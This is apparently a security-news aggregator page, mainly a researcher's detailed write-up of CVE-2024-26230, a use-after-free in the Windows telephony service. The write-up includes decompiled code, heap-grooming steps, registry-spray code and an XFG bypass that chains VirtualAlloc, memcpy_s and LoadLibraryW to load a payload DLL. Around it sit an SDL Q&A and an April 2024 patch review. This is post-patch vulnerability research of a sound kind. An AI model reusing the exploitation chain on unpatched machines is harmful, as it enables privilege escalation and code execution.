Aggregator

SDL 17/100问：威胁建模和架构安全评审，有何异同？

1 year ago

在SDL中，威胁建模和架构安全评审通常是相辅相成的，虽说它们的目的一样，但出发点和关注点不同： 1、威胁建模：通过分析或模拟攻击场景来识别潜在的安全威胁。通常涉及对系统的数据流、信任边界、入口点和输出点进行全面分析。有成熟的方法论，如STRIDE、VAST、DREAD等。 2、架构安全评审：通过审查文档和与相关人员讨论，审查系统的整体架构设计，以确保其满足安全需求和标准。不仅关注整个系统的安全性，还关注架构层面的决策是否可能导致潜在的安全风险。就安全活动的开展顺序而言，我更偏向推荐先架构安全评审，再威胁建模。因为前者主要是验证性质，更关注安全需求考虑情况、具体怎么设计；后者是通过体系化的方法来发现可能存在的潜在隐患，重在发现新的问题并消除风险。更多软件安全内容，可以访问： 1、SDL100问：我与SDL的故事 SDL 1/100问：SDL与DevSecOps有何异同？ SDL 2/100问：如何在不同企业实施SDL？ SDL 3/100问：SAST误报太高，如何解决？ SDL 4/100问：SDL需要哪些人参与？ SDL 5/100问：在devops中做开发安全，会遇到哪些问题？ SDL 6/100问：如何实施安全需求？ SDL 7/100问：安全需求，有哪些来源？ SDL 8/100问：安全需求怎么实现自动化？ SDL 9/100问：实施安全需求，会遇到哪些难题？ SDL 10/100问：安全需求和安全设计有何异同及关联？ SDL 11/100问：设计阶段应开展哪些安全活动？ SDL 12/100问：有哪些不错的安全设计参考资料？ SDL 13/100问：安全设计要求怎么做才能落地？ SDL 14/100问：有哪些威胁建模方法论？ SDL 15/100问：有哪些威胁建模工具？ SDL 16/100问：如何开始或实施威胁建模？ 2、SDL最初实践系列开篇安全需求安全设计安全开发安全测试安全审核安全响应

Comparing the Benefits of Microsegmentation vs. VLANs

The Akamai Blog

1 year ago

Jacob Abrams

eXotic Visit campaign: Tracing the footprints of Virtual Invaders

WeLiveSecurity

1 year ago

ESET researchers uncovered the eXotic Visit espionage campaign that targets users mainly in India and Pakistan with seemingly innocuous apps

A trick, the story of CVE-2024-26230

K0shl

1 year ago

Author: k0shl of Cyber KunlunSummary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is a RPC based service which is not running by default, but it could be actived by invoking StartServiceW API with normal user privilege.

There are only three functions in telephony RPC server interface.

long ClientAttach( [out][context_handle] void** arg_0, [in]long arg_1, [out]long *arg_2, [in][string] wchar_t* arg_3, [in][string] wchar_t* arg_4); void ClientRequest( [in][context_handle] void* arg_0, [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, [in]long arg_2, [in][out]long *arg_3); void ClientDetach( [in][out][context_handle] void** arg_0); }

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5) { [...] if ( object ) { *object = 0x474F4C44; // =====> [a] v38 = *(_QWORD *)(contexthandle + 184); *((_QWORD *)object + 10) = v38; if ( v38 ) *(_QWORD *)(v38 + 72) = object; *(_QWORD *)(contexthandle + 184) = object; // =======> [b] a2[8] = object[22]; } [...] }

As the code above, service stores the magic value 0x474F4C44(GOLD) into the object[a] and inserts object into the context handle object[b].Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object if ( v28 && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28), *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object ) {

However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2) { [...] v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64); [...] if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object [...] // free the object }

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5) { [...] v7 = (unsigned int)controlledbuffer[2]; v8 = 0i64; v9 = controlledbuffer + 4; v10 = controlledbuffer + 5; if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) ) goto LABEL_30; switch ( controlledbuffer[3] ) { [...] case 3: for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8 { if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value { v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer goto LABEL_27; } } break; [...] if ( v8 ) { result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF [...] }

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000 rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44 rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000 r8=000000ec0f9bea30 r9=000000ec0f9bee90 r10=ffffffffffffffff r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00 r14=00000203df002b00 r15=000000ec0f9bf238 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 tapisrv!FreeDialogInstance+0x7c: 00007ffc`b4b4955c 393e cmp dword ptr [rsi],edi ds:00000000`00000000=???????? 0:001> K # Child-SP RetAddr Call Site 00 000000ec`0f9bee80 00007ffc`b4b47295 tapisrv!FreeDialogInstance+0x7c 01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc tapisrv!CleanUpClient+0x451 02 000000ec`0f9bf2a0 00007ffc`d9b85809 tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c 03 000000ec`0f9bf2e0 00007ffc`d9b840f6 RPCRT4!NDRSRundownContextHandle+0x21 04 000000ec`0f9bf330 00007ffc`d9bcb935 RPCRT4!DestroyContextHandlesForGuard+0xbe 05 000000ec`0f9bf370 00007ffc`d9bcb8b4 RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d 06 000000ec`0f9bf3a0 00007ffc`d9bcade4 RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14 07 000000ec`0f9bf3d0 00007ffc`d9bcad27 RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80 08 000000ec`0f9bf400 00007ffc`d9b8704e RPCRT4!OSF_SCONNECTION::FreeObject+0x17 09 000000ec`0f9bf430 00007ffc`d9b861ea RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e 0a 000000ec`0f9bf510 00007ffc`d9b97f5c RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e 0b 000000ec`0f9bf610 00007ffc`d9b97e22 RPCRT4!CO_ConnectionThreadPoolCallback+0xbc 0c 000000ec`0f9bf690 00007ffc`d8828f51 RPCRT4!CO_NmpThreadPoolCallback+0x42 0d 000000ec`0f9bf6d0 00007ffc`db34aa58 KERNELBASE!BasepTpIoCallback+0x51 0e 000000ec`0f9bf720 00007ffc`db348d03 ntdll!TppIopExecuteCallback+0x198 Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So, I need to ensure whether there is a suitable object in the telephony service. There is a small tip that I don't even need an 'object.' What I want is just a memory allocation that I can control both size and content.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a] { if ( !RegOpenKeyExW( phkResult, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", 0, 0x20019u, &hKey) ) { GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b] RegCloseKey(hKey); } /////////////////////////////////////////// if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c] { [...] } else { v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d] v7 = (wchar_t *)v6; if ( v6 ) { *(_WORD *)v6 = 34; LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e] [...] }

In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

After ensure there is a suitable primitive, I think it's time to perform heap feng shui now. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.

First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
Then, I free some of them to create some holes using the "FreeDiagInstance" function.
Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.

XFG mitigation

After the final step of heap fengshui in the previous section, the controlled key value heap occupies the target hole, and when I invoke "TUISPIDLLCallback" function to trigger the "use" step, as the pseudo code above, controlled buffer is the input buffer of RPC interface, if I set it to 3, it will compare a magic value with the worker object, then obtain a virtual function address from the worker object, so that I only need to set this two value in the content of registry key value.

RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall"); RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey); BYTE lpbuffer[0x5e] = { 0 }; *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018; *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I can use ROP if there isn't XFG mitigation. However, XFG will limit the RIP register from jumping to a ROP gadget address, causing an INT29 exception when the control flow check fails.

Last step, the truely challenge

Just like the exploitation I introduced in my previous blog post—the exploitation of CNG key isolation—when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual address to the LoadLibrary address.

Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF

The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
The second parameter is also obtained from a RPC input buffer, but it must be a const value, it's equal to the case number I mentioned in previous section, it must be 3.
The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load payload DLL, I need to find out another way to complete the exploitation. At this time, I want to find a indirectly function to load payload DLL, because the third parameter is a pointer and the content of it I could control, I need a function has the following code:

func(a1, a2, a3, ...){ [...] path = a3; LoadLibarary(path); [...] }

The limitation in this scenario is that I can't control which DLL is loaded in the RPC server. Therefore, I can only use existing DLLs in the RPC server, which takes some time for me to find an eligible function. But it's failed to find an eligible function.

It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.

The trick

After some time, I remember an interesting API -- VirtualAlloc.

LPVOID VirtualAlloc( [in, optional] LPVOID lpAddress, [in] SIZE_T dwSize, [in] DWORD flAllocationType, [in] DWORD flProtect );

The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.

I notice that I can allocate a 32-bits address with this function!

The second parameter is a constant value representing the buffer size to allocate. However, it's not necessary for my purpose. The last parameter is a controlled DWORD value, which I can set to the value for flProtect. I could set it to PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF if(!result){ [...] } *controlledbuffer = result; return result;

The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.

But I still can't predict the low 32-bits value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocate buffer size to find out if there is any regularity. Actually, the maximum size of the RPC client could be set is larger than 0x40000000. When I set the allocate size to 0x40000000, I found an interesting situation.

I find out that when the allocate size is set to 0x40000000, the low 32-bits address of the pointer increases linearly, which makes it predictable.

That means, for example, if the leaked low 32-bits return 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32-bits will be 0xfd800000. Additionally, the offset of the third parameter couldn't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bits address is larger than 0xc0000000. In this way, the low 32-bits of the third parameter could be a DWORD value larger than 0x100000000 after the address is added with the offset. It's possible to set the third parameter to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).

As for now, I make heap fengshui and control the all content of the heap hole with the controllable registry key value, and for bypassing XFG mitigation, I need to first leak the low 32-bits address by setting the MIDL_user_allocate function address in key value, and then set the VirtualAlloc function address in key value, obviously, it doesn't end if I allocate 32-bits address succeed, I need to invoke "TUISPIDLLCallback" multiple times to complete bypassing XFG mitigation. The good news is that I could control the timing of "use", so all I need to do is free the registry key value heap, set the new key value with the target function address, allocate a new key value heap, and use it again.

tapisrv!TUISPIDLLCallback+0x1cc: 00007fff`7c27fecc ff154ee80000 call qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)} 0:007> u rax KERNEL32!VirtualAllocStub: 00007fff`aeae3bf0 48ff2551110700 jmp qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)] 00007fff`aeae3bf7 cc int 3 00007fff`aeae3bf8 cc int 3 00007fff`aeae3bf9 cc int 3 00007fff`aeae3bfa cc int 3 00007fff`aeae3bfb cc int 3 00007fff`aeae3bfc cc int 3 00007fff`aeae3bfd cc int 3 0:007> r r8d r8d=3000 0:007> r r9d r9d=40 0:007> r rcx rcx=00000000ba000000 0:007> r rdx rdx=0000000000000003

According to the debugging information, we can see that every parameter satisfies the request. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.

0:007> p tapisrv!TUISPIDLLCallback+0x1d2: 00007fff`7c27fed2 85c0 test eax,eax 0:007> dq ba000000 00000000`ba000000 00000000`00000000 00000000`00000000 00000000`ba000010 00000000`00000000 00000000`00000000 00000000`ba000020 00000000`00000000 00000000`00000000 00000000`ba000030 00000000`00000000 00000000`00000000 00000000`ba000040 00000000`00000000 00000000`00000000

This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.

0:009> dc ba000000 00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s. 00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p. 00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a. 00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k. 00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l.

There is one step last is invoking LoadLibrary to load payload DLL.

0:009> u KERNELBASE!LoadLibraryW: 00007fff`ad1f2480 4533c0 xor r8d,r8d 00007fff`ad1f2483 33d2 xor edx,edx 00007fff`ad1f2485 e9e642faff jmp KERNELBASE!LoadLibraryExW (00007fff`ad196770) 00007fff`ad1f248a cc int 3 00007fff`ad1f248b cc int 3 00007fff`ad1f248c cc int 3 00007fff`ad1f248d cc int 3 00007fff`ad1f248e cc int 3 0:009> dc rcx 00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s. 00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p. 00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a. 00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k. 00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l. 00000000`ba000050 00000000 00000000 00000000 00000000 ................ 00000000`ba000060 00000000 00000000 00000000 00000000 ................ 00000000`ba000070 00000000 00000000 00000000 00000000 ................ 0:009> k # Child-SP RetAddr Call Site 00 000000ab`ac97eac8 00007fff`7c27fed2 KERNELBASE!LoadLibraryW 01 000000ab`ac97ead0 00007fff`7c27817a tapisrv!TUISPIDLLCallback+0x1d2 02 000000ab`ac97eb60 00007fff`afb57f13 tapisrv!ClientRequest+0xba

WHEREISK0SHL

提供测试账号！Lazada双倍奖励活动报名开启

阿里安全响应中心

1 year ago

活动时间：2024.4.12 上午10点 - 2024.4.26 上午10点

基于LLM技术进行Webshell模拟请求流量生成技术研究 - 郑瀚

LittleHann

1 year ago

该文被密码保护。

郑瀚

寻找金牌出题手！SecBench挑战者奖励计划火热开启！

腾讯科恩实验室

1 year ago

首个网络安全大模型评测平台SecBench，挑战者奖励计划正式开启。

NOVASEC 邀请您预投2024 HVV简历啦!!!

NOVASEC

1 year ago

NOVASEC 邀请您预投2024 HVV简历啦!!!

寻找金牌出题手！SecBench挑战者奖励计划火热开启！

腾讯安全应急响应中心

1 year ago

挑战大模型，寻找金牌出题手！ 1分钟丝滑上手，奖励门槛超低。

寻找金牌出题手！SecBench挑战者奖励计划火热开启！

腾讯安全应急响应中心

1 year ago

挑战大模型，寻找金牌出题手！ 1分钟丝滑上手，奖励门槛超低。

【补丁日速递】2024年4月微软补丁日安全风险通告

赛博昆仑CERT

1 year ago

【补丁日速递】2024年4月微软补丁日安全风险通告

Wednesday, April 10, 2024 Security Releases

Node.js Blog: Vulnerability Reports

1 year ago

AI Will Power a New Generation of Ransomware, Predicts Britain’s NCSC

Ransomware.org

1 year ago

How will the sudden emergence of artificial intelligence (AI) platforms such as ChatGPT influence future ransomware attacks? Right now, there are so many pessimistic answers to this question it can be hard to judge the real-world risk they pose. On the one hand, there’s no doubt that AI can easily be used to improve individual […]

The post AI Will Power a New Generation of Ransomware, Predicts Britain’s NCSC appeared first on Ransomware.org.

John E. Dunn

The April 2024 Security Updates Review

Zero Day Initiative

1 year ago

It’s the second Tuesday of the month, and Adobe and Microsoft have released a fresh crop of security updates. Take a break from your other activities and join us as we review the details of their latest advisories. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for April 2024

For April, Adobe released nine patches addressing 24 CVEs in Adobe After Effects, Photoshop, Commerce, InDesign, Experience Manager, Media Encoder, Bridge, Illustrator, and Adobe Animate. The largest of these updates is for Experience Manager, however, all of the bugs being patched are simple Cross-site Scripting (XSS) bugs. Still, if exploited, these Important-severity bugs could lead to code execution if exploited. The only other patches that address multiple CVEs are the fixes for Animate and Commerce. The patch for Animate addresses four bugs. Two of these are rated Critical and could lead to arbitrary code execution. The patch for Commerce also fixes two Critical-rated bugs, one XSS and one improper input validation bug. Both could lead to code execution.

Then we have several patches that are all info leaks due to an Out-Of-Bounds (OOB) read. These were all reported by the same person, and it makes me wonder if there is shared code between these products that makes them all vulnerable. In any case, After Effects, Photoshop, InDesign, Bridge, and Illustrator all fall into this category. That just leaves the update for Media Encoder. This patch fixes a single buffer overflow that could lead to code execution.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for April 2024

This month, Microsoft released a whopping 147 new CVEs in Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and Visual Studio; SQL Server; DNS Server; Windows Defender; Bitlocker; and Windows Secure Boot. If you include the third-party CVEs being documented this month, the CVE count comes to 155. A total of three of these bugs came through the ZDI program. None of the bugs disclosed at Pwn2Own Vancouver are fixed with this release.

Of the new patches released today, only three are rated Critical, 142 are rated Important, and two are rated Moderate in severity. This is the largest release from Microsoft this year and the largest since at least 2017. As far as I can tell, it’s the largest Patch Tuesday release from Microsoft of all time. It’s not clear if this is due to a backlog from the slower months or a surge in vulnerability reporting. It will be interesting to see which trend continues.

None of the CVEs released today are listed as currently under active attack and none are listed as publicly known at the time of release. However, the bug reported by ZDI threat hunter Peter Girnus was found in the wild. We have evidence this is being exploited in the wild, and I’m listing it as such.

Let’s take a closer look at some of the more interesting updates for this month, starting with a bug we consider to be currently exploited in the wild:

- CVE-2024-29988 – SmartScreen Prompt Security Feature Bypass Vulnerability
This is an odd one, as a ZDI threat researcher found this vulnerability being in the wild, although Microsoft currently doesn’t list this as exploited. I would treat this as in the wild until Microsoft clarifies. The bug itself acts much like CVE-2024-21412 – it bypasses the Mark of the Web (MotW) feature and allows malware to execute on a target system. Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass MotW.

- CVE-2024-20678 – Remote Procedure Call Runtime Remote Code Execution Vulnerability
There is a long history of RPC exploits being seen in the wild, so any RPC bug that could lead to code execution turns heads. This bug does require authentication, but it doesn’t require any elevated permission. Any authenticated user could hit it. It’s not clear if you could hit this if you authenticated as Guest or an anonymous user. A quick search shows about 1.3 million systems with TCP port 135 exposed to the internet. I expect a lot of people will be looking to exploit this in short order.

- CVE-2024-20670 – Outlook for Windows Spoofing Vulnerability
This bug is listed as a spoofing bug, but based on the end result of exploitation, I would consider this information disclosure. In this case, the information disclosed would be NTLM hashes, which could then be used for Spoofing targeted users. Either way, a user would need to click something in an email to trigger this vulnerability. The Preview Pane is NOT an attack vector. However, we have seen a rash of NTLM relaying bugs over the last few months. With the wide user base of Outlook, this will likely be targeted by threat actors in the coming months.

- CVE-2024-26221 – Windows DNS Server Remote Code Execution Vulnerability
This is one of seven DNS RCE bugs being patched this month and all are documented identically. These bugs allow RCE on an affected DNS server if the attacker has the privileges to query the DNS server. There is a timing factor here as well, but if the DNS queries are timed correctly, the attacker can execute arbitrary code on the target server. Although not specifically stated, it seems logical that the code execution would occur at the level of the DNS service, which is elevated. I really don’t need to tell you that your DNS servers are critical targets, so please take these bugs seriously and test and deploy the patches quickly.

Here’s the full list of CVEs released by Microsoft for April 2024:

*Note that post-release, Microsoft confirmed CVE-2024-26234 is also under active attack. The table has been updated to reflect this new information

CVE Title Severity CVSS Public Exploited Type CVE-2024-29988 SmartScreen Prompt Security Feature Bypass Vulnerability Important 8.8 No Yes RCE CVE-2024-26234 Proxy Driver Spoofing Vulnerability Important 6.7 Yes Yes Spoofing CVE-2024-21322 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 7.2 No No RCE CVE-2024-21323 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2024-29053 Microsoft Defender for IoT Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2024-21409 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability Important 7.3 No No RCE CVE-2024-29063 † Azure AI Search Information Disclosure Vulnerability Important 7.3 No No Info CVE-2024-28917 † Azure Arc-enabled Kubernetes Extension Cluster-Scope Elevation of Privilege Vulnerability Important 6.2 No No EoP CVE-2024-21424 † Azure Compute Gallery Elevation of Privilege Vulnerability Important 6.5 No No EoP CVE-2024-29993 Azure CycleCloud Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2024-26193 † Azure Migrate Remote Code Execution Vulnerability Important 6.4 No No RCE CVE-2024-29989 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 8.4 No No EoP CVE-2024-20665 BitLocker Security Feature Bypass Vulnerability Important 6.1 No No SFB CVE-2024-26212 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-26215 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-26195 DHCP Server Service Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26202 DHCP Server Service Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26219 HTTP.sys Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-2201 * Intel: CVE-2024-2201 Branch History Injection Important 4.7 No No Info CVE-2024-23593 * Lenovo: CVE-2024-23593 Zero Out Boot Manager and drop to UEFI Shell Important 7.8 No No SFB CVE-2024-23594 * Lenovo: CVE-2024-23594 Stack Buffer Overflow in LenovoBT.efi Important 6.4 No No SFB CVE-2024-26256 libarchive Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-29990 † Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability Important 9 No No EoP CVE-2024-26213 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2024-28904 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-28905 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-28907 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-21324 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP CVE-2024-29054 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP CVE-2024-29055 Microsoft Defender for IoT Elevation of Privilege Vulnerability Important 7.2 No No EoP CVE-2024-26257 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-26158 Microsoft Install Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-26209 Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability Important 5.5 No No Info CVE-2024-26208 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2024-26232 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Important 7.3 No No RCE CVE-2024-28929 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28930 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28931 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28932 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28933 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28934 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28935 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28936 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28937 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-28938 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE 